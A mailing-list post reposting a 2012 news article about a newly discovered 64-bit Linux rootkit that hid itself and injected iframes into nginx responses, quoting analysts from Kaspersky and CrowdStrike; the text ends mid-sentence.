|FROM ||Ruben Safir
|SUBJECT ||Subject: [NYLXS - HANGOUT] Linux security news
New Linux Rootkit Uncovered
The malware appears to be contract work by an intermediate-level Russian
programmer, according to an analysis by CrowdStrike.
By Jeff Goldman | November 22, 2012
New Linux malware was recently discovered by a user who published its
details on the Full Disclosure mailing list.
"The anonymous poster, who runs a web service, found the rootkit on
company servers after customers said they were redirected to malicious
sites," writes SC Magazine's Danielle Walker.
"The binary is more than 500k, but its size is due to the fact that it
hasn't been stripped (i.e. it was compiled with the debugging
information)," writes Kaspersky's Marta Janus. "Perhaps it's still in
the development stage, because some of the functions don’t seem to be
fully working or they are not fully implemented yet."
"The software nasty targets machines running 64-bit GNU/Linux and a web
server, and acts like a rootkit by hiding itself from administrators,"
writes The Register's John Leyden. "A browser fetching a website served
by the compromised system will be quietly directed via an HTML iframe to
malicious sites loaded with malware to attack the web visitor's machine."
"Considering that this rootkit was used to non-selectively inject
iframes into nginx webserver responses, it seems likely that this
rootkit is part of a generic cyber crime operation and not a targeted
attack," CrowdStrike senior security researcher Georg Wicherski wrote in
a detailed analysis. "However, a Waterhole attack, where a site mostly
visited from a certain target audience is infected, would also be
plausible. Since no identifying strings yielded results in an Internet
search ... it appears that this is not a modification of a publicly
available rootkit. Rather, it seems that this is contract work of an
intermediate programmer with no extensive kernel experience, later
customized beyond repair by the buyer."
"The firm, looking at the tools, techniques and procedures employed and
some background information it could not disclose, suggested the creator
of the rootkit was likely to be Russian," writes TechWeekEurope's Tom